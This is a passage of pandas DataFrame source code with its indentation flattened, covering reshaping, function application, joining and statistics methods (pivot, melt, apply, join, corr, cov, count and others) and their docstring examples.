valid_indices = self._get_valid_indices()
return valid_indices[0] if len(valid_indices) else None
@Appender(_shared_docs['valid_index'] % {
'position': 'last', 'klass': 'DataFrame'})
def last_valid_index(self):
if len(self) == 0:
return None
valid_indices = self._get_valid_indices()
return valid_indices[-1] if len(valid_indices) else None
# ----------------------------------------------------------------------
# Data reshaping
def pivot(self, index=None, columns=None, values=None):
"""
Reshape data (produce a "pivot" table) based on column values. Uses
unique values from index / columns to form axes of the resulting
DataFrame.
Parameters
----------
index : string or object, optional
Column name to use to make new frame's index. If None, uses
existing index.
columns : string or object
Column name to use to make new frame's columns
values : string or object, optional
Column name to use for populating new frame's values. If not
specified, all remaining columns will be used and the result will
have hierarchically indexed columns
Returns
-------
pivoted : DataFrame
See also
--------
DataFrame.pivot_table : generalization of pivot that can handle
duplicate values for one index/column pair
DataFrame.unstack : pivot based on the index values instead of a
column
Notes
-----
For finer-tuned control, see hierarchical indexing documentation along
with the related stack/unstack methods
Examples
--------
>>> df = pd.DataFrame({'foo': ['one','one','one','two','two','two'],
...                    'bar': ['A', 'B', 'C', 'A', 'B', 'C'],
...                    'baz': [1, 2, 3, 4, 5, 6]})
>>> df
foo bar baz
0 one A 1
1 one B 2
2 one C 3
3 two A 4
4 two B 5
5 two C 6
>>> df.pivot(index='foo', columns='bar', values='baz')
A B C
one 1 2 3
two 4 5 6
>>> df.pivot(index='foo', columns='bar')['baz']
A B C
one 1 2 3
two 4 5 6
"""
from pandas.core.reshape.reshape import pivot
return pivot(self, index=index, columns=columns, values=values)
_shared_docs['pivot_table'] = """
Create a spreadsheet-style pivot table as a DataFrame. The levels in
the pivot table will be stored in MultiIndex objects (hierarchical
indexes) on the index and columns of the result DataFrame
Parameters
----------%s
values : column to aggregate, optional
index : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table index. If an array is passed,
it is used in the same manner as column values.
columns : column, Grouper, array, or list of the previous
If an array is passed, it must be the same length as the data. The
list can contain any of the other types (except list).
Keys to group by on the pivot table column. If an array is passed,
it is used in the same manner as column values.
aggfunc : function, list of functions, dict, default numpy.mean
If list of functions passed, the resulting pivot table will have
hierarchical columns whose top level are the function names
(inferred from the function objects themselves)
If dict is passed, the key is column to aggregate and value
is function or list of functions
fill_value : scalar, default None
Value to replace missing values with
margins : boolean, default False
Add all row / columns (e.g. for subtotal / grand totals)
dropna : boolean, default True
Do not include columns whose entries are all NaN
margins_name : string, default 'All'
Name of the row / column that will contain the totals
when margins is True.
Examples
--------
>>> df = pd.DataFrame({"A": ["foo", "foo", "foo", "foo", "foo",
... "bar", "bar", "bar", "bar"],
... "B": ["one", "one", "one", "two", "two",
... "one", "one", "two", "two"],
... "C": ["small", "large", "large", "small",
... "small", "large", "small", "small",
... "large"],
... "D": [1, 2, 2, 3, 3, 4, 5, 6, 7]})
>>> df
A B C D
0 foo one small 1
1 foo one large 2
2 foo one large 2
3 foo two small 3
4 foo two small 3
5 bar one large 4
6 bar one small 5
7 bar two small 6
8 bar two large 7
>>> table = pivot_table(df, values='D', index=['A', 'B'],
... columns=['C'], aggfunc=np.sum)
>>> table
C large small
A B
bar one 4.0 5.0
two 7.0 6.0
foo one 4.0 1.0
two NaN 6.0
>>> table = pivot_table(df, values=['D', 'E'], index=['A', 'C'],
... aggfunc={'D': np.mean,
... 'E': [min, max, np.mean]})
>>> table
D E
mean max mean min
A C
bar large 5.500000 16 14.5 13
small 5.500000 15 14.5 14
foo large 2.000000 10 9.5 9
small 2.333333 12 11.0 8
Returns
-------
table : DataFrame
See also
--------
DataFrame.pivot : pivot without aggregation that can handle
non-numeric data
"""
@Substitution('')
@Appender(_shared_docs['pivot_table'])
def pivot_table(self, values=None, index=None, columns=None,
aggfunc='mean', fill_value=None, margins=False,
dropna=True, margins_name='All'):
from pandas.core.reshape.pivot import pivot_table
return pivot_table(self, values=values, index=index, columns=columns,
aggfunc=aggfunc, fill_value=fill_value,
margins=margins, dropna=dropna,
margins_name=margins_name)
def stack(self, level=-1, dropna=True):
"""
Pivot a level of the (possibly hierarchical) column labels, returning a
DataFrame (or Series in the case of an object with a single level of
column labels) having a hierarchical index with a new inner-most level
of row labels.
The level involved will automatically get sorted.
Parameters
----------
level : int, string, or list of these, default last level
Level(s) to stack, can pass level name
dropna : boolean, default True
Whether to drop rows in the resulting Frame/Series with no valid
values
Examples
--------
>>> s
a b
one 1. 2.
two 3. 4.
>>> s.stack()
one a 1
b 2
two a 3
b 4
Returns
-------
stacked : DataFrame or Series
"""
from pandas.core.reshape.reshape import stack, stack_multiple
if isinstance(level, (tuple, list)):
return stack_multiple(self, level, dropna=dropna)
else:
return stack(self, level, dropna=dropna)
def unstack(self, level=-1, fill_value=None):
"""
Pivot a level of the (necessarily hierarchical) index labels, returning
a DataFrame having a new level of column labels whose inner-most level
consists of the pivoted index labels. If the index is not a MultiIndex,
the output will be a Series (the analogue of stack when the columns are
not a MultiIndex).
The level involved will automatically get sorted.
Parameters
----------
level : int, string, or list of these, default -1 (last level)
Level(s) of index to unstack, can pass level name
fill_value : replace NaN with this value if the unstack produces
missing values
.. versionadded:: 0.18.0
See also
--------
DataFrame.pivot : Pivot a table based on column values.
DataFrame.stack : Pivot a level of the column labels (inverse operation
from `unstack`).
Examples
--------
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1.0, 5.0), index=index)
>>> s
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
>>> s.unstack(level=-1)
a b
one 1.0 2.0
two 3.0 4.0
>>> s.unstack(level=0)
one two
a 1.0 3.0
b 2.0 4.0
>>> df = s.unstack(level=0)
>>> df.unstack()
one a 1.0
b 2.0
two a 3.0
b 4.0
dtype: float64
Returns
-------
unstacked : DataFrame or Series
"""
from pandas.core.reshape.reshape import unstack
return unstack(self, level, fill_value)
_shared_docs['melt'] = ("""
"Unpivots" a DataFrame from wide format to long format, optionally
leaving identifier variables set.
This function is useful to massage a DataFrame into a format where one
or more columns are identifier variables (`id_vars`), while all other
columns, considered measured variables (`value_vars`), are "unpivoted" to
the row axis, leaving just two non-identifier columns, 'variable' and
'value'.
%(versionadded)s
Parameters
----------
frame : DataFrame
id_vars : tuple, list, or ndarray, optional
Column(s) to use as identifier variables.
value_vars : tuple, list, or ndarray, optional
Column(s) to unpivot. If not specified, uses all columns that
are not set as `id_vars`.
var_name : scalar
Name to use for the 'variable' column. If None it uses
``frame.columns.name`` or 'variable'.
value_name : scalar, default 'value'
Name to use for the 'value' column.
col_level : int or string, optional
If columns are a MultiIndex then use this level to melt.
See also
--------
%(other)s
pivot_table
DataFrame.pivot
Examples
--------
>>> import pandas as pd
>>> df = pd.DataFrame({'A': {0: 'a', 1: 'b', 2: 'c'},
... 'B': {0: 1, 1: 3, 2: 5},
... 'C': {0: 2, 1: 4, 2: 6}})
>>> df
A B C
0 a 1 2
1 b 3 4
2 c 5 6
>>> %(caller)sid_vars=['A'], value_vars=['B'])
A variable value
0 a B 1
1 b B 3
2 c B 5
>>> %(caller)sid_vars=['A'], value_vars=['B', 'C'])
A variable value
0 a B 1
1 b B 3
2 c B 5
3 a C 2
4 b C 4
5 c C 6
The names of 'variable' and 'value' columns can be customized:
>>> %(caller)sid_vars=['A'], value_vars=['B'],
... var_name='myVarname', value_name='myValname')
A myVarname myValname
0 a B 1
1 b B 3
2 c B 5
If you have multi-index columns:
>>> df.columns = [list('ABC'), list('DEF')]
>>> df
A B C
D E F
0 a 1 2
1 b 3 4
2 c 5 6
>>> %(caller)scol_level=0, id_vars=['A'], value_vars=['B'])
A variable value
0 a B 1
1 b B 3
2 c B 5
>>> %(caller)sid_vars=[('A', 'D')], value_vars=[('B', 'E')])
(A, D) variable_0 variable_1 value
0 a B E 1
1 b B E 3
2 c B E 5
""")
@Appender(_shared_docs['melt'] %
dict(caller='df.melt(',
versionadded='.. versionadded:: 0.20.0\n',
other='melt'))
def melt(self, id_vars=None, value_vars=None, var_name=None,
value_name='value', col_level=None):
from pandas.core.reshape.melt import melt
return melt(self, id_vars=id_vars, value_vars=value_vars,
var_name=var_name, value_name=value_name,
col_level=col_level)
# ----------------------------------------------------------------------
# Time series-related
def diff(self, periods=1, axis=0):
"""
1st discrete difference of object
Parameters
----------
periods : int, default 1
Periods to shift for forming difference
axis : {0 or 'index', 1 or 'columns'}, default 0
Take difference over rows (0) or columns (1).
.. versionadded:: 0.16.1
Returns
-------
diffed : DataFrame
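Examples
--------
A small, illustrative example (the input values are arbitrary):
>>> df = pd.DataFrame({'a': [1, 2, 4, 7]})  # arbitrary example data
>>> df.diff()
     a
0  NaN
1  1.0
2  2.0
3  3.0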
"""
bm_axis = self._get_block_manager_axis(axis)
new_data = self._data.diff(n=periods, axis=bm_axis)
return self._constructor(new_data)
# ----------------------------------------------------------------------
# Function application
def _gotitem(self, key, ndim, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : string / list of selections
ndim : 1,2
requested ndim of result
subset : object, default None
subset to act on
"""
if subset is None:
subset = self
# TODO: _shallow_copy(subset)?
return self[key]
_agg_doc = dedent("""
Examples
--------
>>> df = pd.DataFrame(np.random.randn(10, 3), columns=['A', 'B', 'C'],
... index=pd.date_range('1/1/2000', periods=10))
>>> df.iloc[3:7] = np.nan
Aggregate these functions across all columns
>>> df.agg(['sum', 'min'])
A B C
sum -0.182253 -0.614014 -2.909534
min -1.916563 -1.460076 -1.568297
Different aggregations per column
>>> df.agg({'A' : ['sum', 'min'], 'B' : ['min', 'max']})
A B
max NaN 1.514318
min -1.916563 -1.460076
sum -0.182253 NaN
See also
--------
pandas.DataFrame.apply
pandas.DataFrame.transform
pandas.DataFrame.groupby.aggregate
pandas.DataFrame.resample.aggregate
pandas.DataFrame.rolling.aggregate
""")
@Appender(_agg_doc)
@Appender(_shared_docs['aggregate'] % dict(
versionadded='.. versionadded:: 0.20.0',
**_shared_doc_kwargs))
def aggregate(self, func, axis=0, *args, **kwargs):
axis = self._get_axis_number(axis)
# TODO: flipped axis
result = None
if axis == 0:
try:
result, how = self._aggregate(func, axis=0, *args, **kwargs)
except TypeError:
pass
if result is None:
return self.apply(func, axis=axis, args=args, **kwargs)
return result
agg = aggregate
def apply(self, func, axis=0, broadcast=False, raw=False, reduce=None,
args=(), **kwds):
"""Applies function along input axis of DataFrame.
Objects passed to functions are Series objects having index
either the DataFrame's index (axis=0) or the columns (axis=1).
Return type depends on whether passed function aggregates, or the
reduce argument if the DataFrame is empty.
Parameters
----------
func : function
Function to apply to each column/row
axis : {0 or 'index', 1 or 'columns'}, default 0
* 0 or 'index': apply function to each column
* 1 or 'columns': apply function to each row
broadcast : boolean, default False
For aggregation functions, return object of same size with values
propagated
raw : boolean, default False
If False, convert each row or column into a Series. If raw=True the
passed function will receive ndarray objects instead. If you are
just applying a NumPy reduction function this will achieve much
better performance
reduce : boolean or None, default None
Try to apply reduction procedures. If the DataFrame is empty,
apply will use reduce to determine whether the result should be a
Series or a DataFrame. If reduce is None (the default), apply's
return value will be guessed by calling func on an empty Series (note:
while guessing, exceptions raised by func will be ignored). If
reduce is True a Series will always be returned, and if False a
DataFrame will always be returned.
args : tuple
Positional arguments to pass to function in addition to the
array/series
Additional keyword arguments will be passed as keywords to the function
Notes
-----
In the current implementation apply calls func twice on the
first column/row to decide whether it can take a fast or slow
code path. This can lead to unexpected behavior if func has
side-effects, as they will take effect twice for the first
column/row.
Examples
--------
>>> df.apply(numpy.sqrt) # returns DataFrame
>>> df.apply(numpy.sum, axis=0) # equiv to df.sum(0)
>>> df.apply(numpy.sum, axis=1) # equiv to df.sum(1)
See also
--------
DataFrame.applymap: For elementwise operations
DataFrame.aggregate: only perform aggregating type operations
DataFrame.transform: only perform transforming type operations
Returns
-------
applied : Series or DataFrame
"""
from pandas.core.apply import frame_apply
op = frame_apply(self,
func=func,
axis=axis,
broadcast=broadcast,
raw=raw,
reduce=reduce,
args=args, **kwds)
return op.get_result()
def applymap(self, func):
"""
Apply a function to a DataFrame that is intended to operate
elementwise, i.e. like doing map(func, series) for each series in the
DataFrame
Parameters
----------
func : function
Python function, returns a single value from a single value
Examples
--------
>>> df = pd.DataFrame(np.random.randn(3, 3))
>>> df
0 1 2
0 -0.029638 1.081563 1.280300
1 0.647747 0.831136 -1.549481
2 0.513416 -0.884417 0.195343
>>> df = df.applymap(lambda x: '%.2f' % x)
>>> df
0 1 2
0 -0.03 1.08 1.28
1 0.65 0.83 -1.55
2 0.51 -0.88 0.20
Returns
-------
applied : DataFrame
See also
--------
DataFrame.apply : For operations on rows/columns
"""
# if we have a dtype == 'M8[ns]', provide boxed values
def infer(x):
if x.empty:
return lib.map_infer(x, func)
return lib.map_infer(x.astype(object).values, func)
return self.apply(infer)
# ----------------------------------------------------------------------
# Merging / joining methods
def append(self, other, ignore_index=False, verify_integrity=False):
"""
Append rows of `other` to the end of this frame, returning a new
object. Columns not in this frame are added as new columns.
Parameters
----------
other : DataFrame or Series/dict-like object, or list of these
The data to append.
ignore_index : boolean, default False
If True, do not use the index labels.
verify_integrity : boolean, default False
If True, raise ValueError on creating index with duplicates.
Returns
-------
appended : DataFrame
Notes
-----
If a list of dict/series is passed and the keys are all contained in
the DataFrame's index, the order of the columns in the resulting
DataFrame will be unchanged.
Iteratively appending rows to a DataFrame can be more computationally
intensive than a single concatenate. A better solution is to append
those rows to a list and then concatenate the list with the original
DataFrame all at once.
See also
--------
pandas.concat : General function to concatenate DataFrame, Series
or Panel objects
Examples
--------
>>> df = pd.DataFrame([[1, 2], [3, 4]], columns=list('AB'))
>>> df
A B
0 1 2
1 3 4
>>> df2 = pd.DataFrame([[5, 6], [7, 8]], columns=list('AB'))
>>> df.append(df2)
A B
0 1 2
1 3 4
0 5 6
1 7 8
With `ignore_index` set to True:
>>> df.append(df2, ignore_index=True)
A B
0 1 2
1 3 4
2 5 6
3 7 8
The following, while not recommended methods for generating DataFrames,
show two ways to generate a DataFrame from multiple data sources.
Less efficient:
>>> df = pd.DataFrame(columns=['A'])
>>> for i in range(5):
... df = df.append({'A': i}, ignore_index=True)
>>> df
A
0 0
1 1
2 2
3 3
4 4
More efficient:
>>> pd.concat([pd.DataFrame([i], columns=['A']) for i in range(5)],
... ignore_index=True)
A
0 0
1 1
2 2
3 3
4 4
"""
if isinstance(other, (Series, dict)):
if isinstance(other, dict):
other = Series(other)
if other.name is None and not ignore_index:
raise TypeError('Can only append a Series if ignore_index=True'
' or if the Series has a name')
if other.name is None:
index = None
else:
# other must have the same index name as self, otherwise
# index name will be reset
index = Index([other.name], name=self.index.name)
combined_columns = self.columns.tolist() + self.columns.union(
other.index).difference(self.columns).tolist()
other = other.reindex(combined_columns, copy=False)
other = DataFrame(other.values.reshape((1, len(other))),
index=index,
columns=combined_columns)
other = other._convert(datetime=True, timedelta=True)
if not self.columns.equals(combined_columns):
self = self.reindex(columns=combined_columns)
elif isinstance(other, list) and not isinstance(other[0], DataFrame):
other = DataFrame(other)
if (self.columns.get_indexer(other.columns) >= 0).all():
other = other.loc[:, self.columns]
from pandas.core.reshape.concat import concat
if isinstance(other, (list, tuple)):
to_concat = [self] + other
else:
to_concat = [self, other]
return concat(to_concat, ignore_index=ignore_index,
verify_integrity=verify_integrity)
def join(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
"""
Join columns with other DataFrame either on index or on a key
column. Efficiently join multiple DataFrame objects by index at once by
passing a list.
Parameters
----------
other : DataFrame, Series with name field set, or list of DataFrame
Index should be similar to one of the columns in this one. If a
Series is passed, its name attribute must be set, and that will be
used as the column name in the resulting joined DataFrame
on : name, tuple/list of names, or array-like
Column or index level name(s) in the caller to join on the index
in `other`, otherwise joins index-on-index. If multiple
values given, the `other` DataFrame must have a MultiIndex. Can
pass an array as the join key if it is not already contained in
the calling DataFrame. Like an Excel VLOOKUP operation
how : {'left', 'right', 'outer', 'inner'}, default: 'left'
How to handle the operation of the two objects.
* left: use calling frame's index (or column if on is specified)
* right: use other frame's index
* outer: form union of calling frame's index (or column if on is
specified) with other frame's index, and sort it
lexicographically
* inner: form intersection of calling frame's index (or column if
on is specified) with other frame's index, preserving the order
of the calling's one
lsuffix : string
Suffix to use from left frame's overlapping columns
rsuffix : string
Suffix to use from right frame's overlapping columns
sort : boolean, default False
Order result DataFrame lexicographically by the join key. If False,
the order of the join key depends on the join type (how keyword)
Notes
-----
on, lsuffix, and rsuffix options are not supported when passing a list
of DataFrame objects
Support for specifying index levels as the `on` parameter was added
in version 0.23.0
Examples
--------
>>> caller = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3', 'K4', 'K5'],
... 'A': ['A0', 'A1', 'A2', 'A3', 'A4', 'A5']})
>>> caller
A key
0 A0 K0
1 A1 K1
2 A2 K2
3 A3 K3
4 A4 K4
5 A5 K5
>>> other = pd.DataFrame({'key': ['K0', 'K1', 'K2'],
... 'B': ['B0', 'B1', 'B2']})
>>> other
B key
0 B0 K0
1 B1 K1
2 B2 K2
Join DataFrames using their indexes.
>>> caller.join(other, lsuffix='_caller', rsuffix='_other')
     A key_caller    B key_other
0 A0 K0 B0 K0
1 A1 K1 B1 K1
2 A2 K2 B2 K2
3 A3 K3 NaN NaN
4 A4 K4 NaN NaN
5 A5 K5 NaN NaN
If we want to join using the key columns, we need to set key to be
the index in both caller and other. The joined DataFrame will have
key as its index.
>>> caller.set_index('key').join(other.set_index('key'))
     A    B
key
K0 A0 B0
K1 A1 B1
K2 A2 B2
K3 A3 NaN
K4 A4 NaN
K5 A5 NaN
Another option to join using the key columns is to use the on
parameter. DataFrame.join always uses other's index but we can use any
column in the caller. This method preserves the original caller's
index in the result.
>>> caller.join(other.set_index('key'), on='key')
     A key    B
0 A0 K0 B0
1 A1 K1 B1
2 A2 K2 B2
3 A3 K3 NaN
4 A4 K4 NaN
5 A5 K5 NaN
See also
--------
DataFrame.merge : For column(s)-on-columns(s) operations
Returns
-------
joined : DataFrame
"""
# For SparseDataFrame's benefit
return self._join_compat(other, on=on, how=how, lsuffix=lsuffix,
rsuffix=rsuffix, sort=sort)
def _join_compat(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
from pandas.core.reshape.merge import merge
from pandas.core.reshape.concat import concat
if isinstance(other, Series):
if other.name is None:
raise ValueError('Other Series must have a name')
other = DataFrame({other.name: other})
if isinstance(other, DataFrame):
return merge(self, other, left_on=on, how=how,
left_index=on is None, right_index=True,
suffixes=(lsuffix, rsuffix), sort=sort)
else:
if on is not None:
raise ValueError('Joining multiple DataFrames only supported'
' for joining on index')
# join indexes only using concat
if how == 'left':
how = 'outer'
join_axes = [self.index]
else:
join_axes = None
frames = [self] + list(other)
can_concat = all(df.index.is_unique for df in frames)
if can_concat:
return concat(frames, axis=1, join=how, join_axes=join_axes,
verify_integrity=True)
joined = frames[0]
for frame in frames[1:]:
joined = merge(joined, frame, how=how, left_index=True,
right_index=True)
return joined
@Substitution('')
@Appender(_merge_doc, indents=2)
def merge(self, right, how='inner', on=None, left_on=None, right_on=None,
left_index=False, right_index=False, sort=False,
suffixes=('_x', '_y'), copy=True, indicator=False,
validate=None):
from pandas.core.reshape.merge import merge
return merge(self, right, how=how, on=on, left_on=left_on,
right_on=right_on, left_index=left_index,
right_index=right_index, sort=sort, suffixes=suffixes,
copy=copy, indicator=indicator, validate=validate)
def round(self, decimals=0, *args, **kwargs):
"""
Round a DataFrame to a variable number of decimal places.
Parameters
----------
decimals : int, dict, Series
Number of decimal places to round each column to. If an int is
given, round each column to the same number of places.
Otherwise dict and Series round to variable numbers of places.
Column names should be in the keys if `decimals` is a
dict-like, or in the index if `decimals` is a Series. Any
columns not included in `decimals` will be left as is. Elements
of `decimals` which are not columns of the input will be
ignored.
Examples
--------
>>> df = pd.DataFrame(np.random.random([3, 3]),
... columns=['A', 'B', 'C'], index=['first', 'second', 'third'])
>>> df
A B C
first 0.028208 0.992815 0.173891
second 0.038683 0.645646 0.577595
third 0.877076 0.149370 0.491027
>>> df.round(2)
A B C
first 0.03 0.99 0.17
second 0.04 0.65 0.58
third 0.88 0.15 0.49
>>> df.round({'A': 1, 'C': 2})
A B C
first 0.0 0.992815 0.17
second 0.0 0.645646 0.58
third 0.9 0.149370 0.49
>>> decimals = pd.Series([1, 0, 2], index=['A', 'B', 'C'])
>>> df.round(decimals)
A B C
first 0.0 1 0.17
second 0.0 1 0.58
third 0.9 0 0.49
Returns
-------
DataFrame object
See Also
--------
numpy.around
Series.round
"""
from pandas.core.reshape.concat import concat
def _dict_round(df, decimals):
for col, vals in df.iteritems():
try:
yield _series_round(vals, decimals[col])
except KeyError:
yield vals
def _series_round(s, decimals):
if is_integer_dtype(s) or is_float_dtype(s):
return s.round(decimals)
return s
nv.validate_round(args, kwargs)
if isinstance(decimals, (dict, Series)):
if isinstance(decimals, Series):
if not decimals.index.is_unique:
raise ValueError("Index of decimals must be unique")
new_cols = [col for col in _dict_round(self, decimals)]
elif is_integer(decimals):
# Dispatch to Series.round
new_cols = [_series_round(v, decimals)
for _, v in self.iteritems()]
else:
raise TypeError("decimals must be an integer, a dict-like or a "
"Series")
if len(new_cols) > 0:
return self._constructor(concat(new_cols, axis=1),
index=self.index,
columns=self.columns)
else:
return self
# ----------------------------------------------------------------------
# Statistical methods, etc.
def corr(self, method='pearson', min_periods=1):
"""
Compute pairwise correlation of columns, excluding NA/null values
Parameters
----------
method : {'pearson', 'kendall', 'spearman'}
* pearson : standard correlation coefficient
* kendall : Kendall Tau correlation coefficient
* spearman : Spearman rank correlation
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result. Currently only available for pearson
and spearman correlation
Returns
-------
y : DataFrame
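Examples
--------
A small, illustrative example (the input values are arbitrary):
>>> df = pd.DataFrame({'x': [1, 2, 3, 4], 'y': [2, 4, 6, 8]})  # arbitrary example data
>>> df.corr()
     x    y
x  1.0  1.0
y  1.0  1.0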
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.values
if method == 'pearson':
correl = libalgos.nancorr(_ensure_float64(mat), minp=min_periods)
elif method == 'spearman':
correl = libalgos.nancorr_spearman(_ensure_float64(mat),
minp=min_periods)
else:
if min_periods is None:
min_periods = 1
mat = _ensure_float64(mat).T
corrf = nanops.get_corr_func(method)
K = len(cols)
correl = np.empty((K, K), dtype=float)
mask = np.isfinite(mat)
for i, ac in enumerate(mat):
for j, bc in enumerate(mat):
if i > j:
continue
valid = mask[i] & mask[j]
if valid.sum() < min_periods:
c = np.nan
elif i == j:
c = 1.
elif not valid.all():
c = corrf(ac[valid], bc[valid])
else:
c = corrf(ac, bc)
correl[i, j] = c
correl[j, i] = c
return self._constructor(correl, index=idx, columns=cols)
def cov(self, min_periods=None):
"""
Compute pairwise covariance of columns, excluding NA/null values
Parameters
----------
min_periods : int, optional
Minimum number of observations required per pair of columns
to have a valid result.
Returns
-------
y : DataFrame
Notes
-----
`y` contains the covariance matrix of the DataFrame's time series.
The covariance is normalized by N-1 (unbiased estimator).
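Examples
--------
A small, illustrative example (the input values are arbitrary):
>>> df = pd.DataFrame({'x': [1, 2, 3], 'y': [2, 4, 6]})  # arbitrary example data
>>> df.cov()
     x    y
x  1.0  2.0
y  2.0  4.0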
"""
numeric_df = self._get_numeric_data()
cols = numeric_df.columns
idx = cols.copy()
mat = numeric_df.values
if notna(mat).all():
if min_periods is not None and min_periods > len(mat):
baseCov = np.empty((mat.shape[1], mat.shape[1]))
baseCov.fill(np.nan)
else:
baseCov = np.cov(mat.T)
baseCov = baseCov.reshape((len(cols), len(cols)))
else:
baseCov = libalgos.nancorr(_ensure_float64(mat), cov=True,
minp=min_periods)
return self._constructor(baseCov, index=idx, columns=cols)
def corrwith(self, other, axis=0, drop=False):
"""
Compute pairwise correlation between rows or columns of two DataFrame
objects.
Parameters
----------
other : DataFrame, Series
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' to compute column-wise, 1 or 'columns' for row-wise
drop : boolean, default False
Drop missing indices from result, default returns union of all
Returns
-------
correls : Series
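Examples
--------
A small, illustrative example (the input values are arbitrary):
>>> df1 = pd.DataFrame({'a': [1, 2, 3], 'b': [1, 0, 1]})  # arbitrary example data
>>> df2 = pd.DataFrame({'a': [2, 4, 6], 'b': [1, 1, 0]})  # arbitrary example data
>>> df1.corrwith(df2)
a    1.0
b   -0.5
dtype: float64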
"""
axis = self._get_axis_number(axis)
this = self._get_numeric_data()
if isinstance(other, Series):
return this.apply(other.corr, axis=axis)
other = other._get_numeric_data()
left, right = this.align(other, join='inner', copy=False)
# mask missing values
left = left + right * 0
right = right + left * 0
if axis == 1:
left = left.T
right = right.T
# demeaned data
ldem = left - left.mean()
rdem = right - right.mean()
num = (ldem * rdem).sum()
dom = (left.count() - 1) * left.std() * right.std()
correl = num / dom
if not drop:
raxis = 1 if axis == 0 else 0
result_index = this._get_axis(raxis).union(other._get_axis(raxis))
correl = correl.reindex(result_index)
return correl
# ----------------------------------------------------------------------
# ndarray-like stats methods
def count(self, axis=0, level=None, numeric_only=False):
"""
Return Series with number of non-NA/null observations over requested
axis. Works with non-floating point data as well (detects NaN and None)
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' for row-wise, 1 or 'columns' for column-wise
level : int or level name, default None
If the axis is a MultiIndex (hierarchical), count along a
particular level, collapsing into a DataFrame
numeric_only : boolean, default False
Include only float, int, boolean data
Returns
-------
count : Series (or DataFrame if level specified)
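Examples
--------
A small, illustrative example (the input values are arbitrary):
>>> df = pd.DataFrame({'a': [1, np.nan, 3], 'b': ['x', 'y', None]})  # arbitrary example data
>>> df.count()
a    2
b    2
dtype: int64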
"""
axis = self._get_axis_number(axis)
if level is not None:
return self._count_level(level, axis=axis,
numeric_only=numeric_only)
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
# GH #423
if len(frame._get_axis(axis)) == 0:
result = Series(0, index=frame._get_agg_axis(axis))
else:
if frame._is_mixed_type:
result = notna(frame).sum(axis=axis)
else:
counts = notna(frame.values).sum(axis=axis)
result = Series(counts, index=frame._get_agg_axis(axis))
return result.astype('int64')
def _count_level(self, level, axis=0, numeric_only=False):
if numeric_only:
frame = self._get_numeric_data()
else:
frame = self
count_axis = frame._get_axis(axis)
agg_axis = frame._get_agg_axis(axis)
if not isinstance(count_axis, MultiIndex):
raise TypeError("Can only count levels on hierarchical %s." %
self._get_axis_name(axis))
if frame._is_mixed_type:
# Since we have mixed types, calling notna(frame.values) might
# upcast everything to object
mask = notna(frame).values
else:
# But use the speedup when we have homogeneous dtypes
mask = notna(frame.values)
if axis == 1:
# We're transposing the mask rather than frame to avoid potential
# upcasts to object, which induces a ~20x slowdown
mask = mask.T
if isinstance(level, compat.string_types):
level = count_axis._get_level_number(level)
level_index = count_axis.levels[level]
labels = _ensure_int64(count_axis.labels[level])
counts = lib.count_level_2d(mask, labels, len(level_index), axis=0)
result = DataFrame(counts, index=level_index, columns=agg_axis)
if axis == 1:
# Undo our earlier transpose
return result.T
else:
return result
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
filter_type=None, **kwds):
axis = self._get_axis_number(axis)
def f(x):
return op(x, axis=axis, skipna=skipna, **kwds)
labels = self._get_agg_axis(axis)
# exclude timedelta/datetime unless we are uniform types
if axis == 1 and self._is_mixed_type and self._is_datelike_mixed_type:
numeric_only = True
if numeric_only is None:
try:
values = self.values
result = f(values)
except Exception as e:
# try by-column first
if filter_type is None and axis == 0:
try:
# this can end up with a non-reduction,
# but not always. if the types are mixed
# with datelike then we need to make sure a Series
# is returned.
# we only end up here if we have not specified
# numeric_only and yet we have tried a
# column-by-column reduction, where we have mixed types.
# So let's just do what we can
result = self.apply(f, reduce=False,
ignore_failures=True)
if result.ndim == self.ndim:
result = result.iloc[0]
return result
except:
pass
if filter_type is None or filter_type == 'numeric':
data = self._get_numeric_data()
elif filter_type == 'bool':
data = self._get_bool_data()
else: # pragma: no cover
e = NotImplementedError("Handling exception with filter_"
"type %s not implemented." %
filter_type)
raise_with_traceback(e)
with np.errstate(all='ignore'):
result = f(data.values)
labels = data._get_agg_axis(axis)
else:
if numeric_only:
if filter_type is None or filter_type == 'numeric':
data = self._get_numeric_data()
elif filter_type == 'bool':
data = self._get_bool_data()
else: # pragma: no cover
msg = ("Generating numeric_only data with filter_type %s"
"not supported." % filter_type)
raise NotImplementedError(msg)
values = data.values
labels = data._get_agg_axis(axis)
else:
values = self.values
result = f(values)
if hasattr(result, 'dtype') and is_object_dtype(result.dtype):
try:
if filter_type is None or filter_type == 'numeric':
result = result.astype(np.float64)
elif filter_type == 'bool' and notna(result).all():
result = result.astype(np.bool_)
except (ValueError, TypeError):
# try to coerce to the original dtypes item by item if we can
if axis == 0:
result = coerce_to_dtypes(result, self.dtypes)
return Series(result, index=labels)
def nunique(self, axis=0, dropna=True):
"""
Return Series with number of distinct observations over requested
axis.
.. versionadded:: 0.20.0
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
dropna : boolean, default True
Don't include NaN in the counts.
Returns
-------
nunique : Series
Examples
--------
>>> df = pd.DataFrame({'A': [1, 2, 3], 'B': [1, 1, 1]})
>>> df.nunique()
A 3
B 1
>>> df.nunique(axis=1)
0 1
1 2
2 2
"""
return self.apply(Series.nunique, axis=axis, dropna=dropna)
def idxmin(self, axis=0, skipna=True):
"""
Return index of first occurrence of minimum over requested axis.
NA/null values are excluded.
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
0 or 'index' for row-wise, 1 or 'columns' for column-wise
skipna : boolean, default True
Exclude NA/null values. If an entire row/column is NA, the result
will be NA.
Raises
------
ValueError
* If the row/column is empty
Returns
-------
idxmin : Series
Notes
-----
